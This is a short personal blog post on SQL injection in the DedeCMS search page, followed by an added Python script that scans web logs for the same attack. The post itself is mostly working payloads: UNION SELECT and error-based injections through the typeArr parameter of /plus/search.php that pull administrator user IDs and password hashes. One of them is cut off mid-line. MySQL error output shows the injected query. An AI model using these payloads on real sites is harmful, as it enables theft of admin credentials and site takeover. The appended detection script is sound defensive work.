Jitao's tweets

- Record something

DedeCMS (织梦) search page exploitation

2019-04-26 Security
/* Code 0
/plus/search.php?keyword=as&typeArr[ uNion ]=a


/* Code 1
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a"

Dim exp2 As String = "/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,6

/* Code 2
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
Error infos: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') UnIon seleCt 1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,2' at line 1
Error sql: SELECT channeltype FROM `www_arctype` WHERE id=11=@`\'`) UnIon seleCt 1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from `www_admin`#@`\'` LIMIT 0,1;
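
A log-detection sketch for the requests above, added here as an example and not part of the original post: in every request the injected text is the array key of `typeArr[...]`, and the error output shows that key ending up after `WHERE id=`. The script assumes legitimate keys are plain integers (an assumption, not stated on the page) and flags any `/plus/search.php` request whose `typeArr` key is anything else; the log lines, IP addresses and the names `scan` and `suspicious_type_keys` are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Client IP and request target from a combined-format access log line.
# The target is matched lazily so a raw space inside the key is tolerated.
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (.+?) HTTP/[\d.]+"')
# Assumption: a legitimate key is an integer type id, e.g. typeArr[12].
SAFE_KEY_RE = re.compile(r'typeArr\[\d+\]')

# Constructed sample log lines (not taken from the page).
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Apr/2019:10:00:01 +0800] "GET /plus/search.php?keyword=as&typeArr[1]=a HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Apr/2019:10:00:07 +0800] "GET /plus/search.php?keyword=as&typeArr[ uNion ]=a HTTP/1.1" 200 812',
    '203.0.113.9 - - [26/Apr/2019:10:00:09 +0800] "GET /plus/search.php?keyword=as&typeArr%5B111%3D1%5D=a HTTP/1.1" 200 640',
    '198.51.100.7 - - [26/Apr/2019:10:00:12 +0800] "GET /index.php?typeArr[x]=a HTTP/1.1" 200 300',
]


def suspicious_type_keys(target):
    """Return the typeArr keys of a search.php request that are not plain integers."""
    path, _, query = target.partition('?')
    if not path.endswith('/plus/search.php'):
        return []
    # parse_qsl percent-decodes names, so %5B...%5D and literal [...] look alike.
    return [key for key, _ in parse_qsl(query, keep_blank_values=True)
            if key.startswith('typeArr') and not SAFE_KEY_RE.fullmatch(key)]


def scan(lines):
    """Return (client_ip, offending_key) pairs for every flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a parseable request line
        for key in suspicious_type_keys(match.group(2)):
            hits.append((match.group(1), key))
    return hits


if __name__ == '__main__':
    for ip, key in scan(SAMPLE_LOG):
        print(f'{ip}\t{key!r}')
```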

